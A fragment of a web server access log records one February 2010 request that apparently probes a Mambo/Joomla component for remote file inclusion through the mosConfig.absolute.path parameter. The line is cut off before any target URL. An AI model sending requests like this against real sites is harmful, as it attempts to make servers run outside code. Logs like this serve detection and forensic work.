222.231.24.246 - - [15/Feb/2010:11:02:30 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig.absolute.p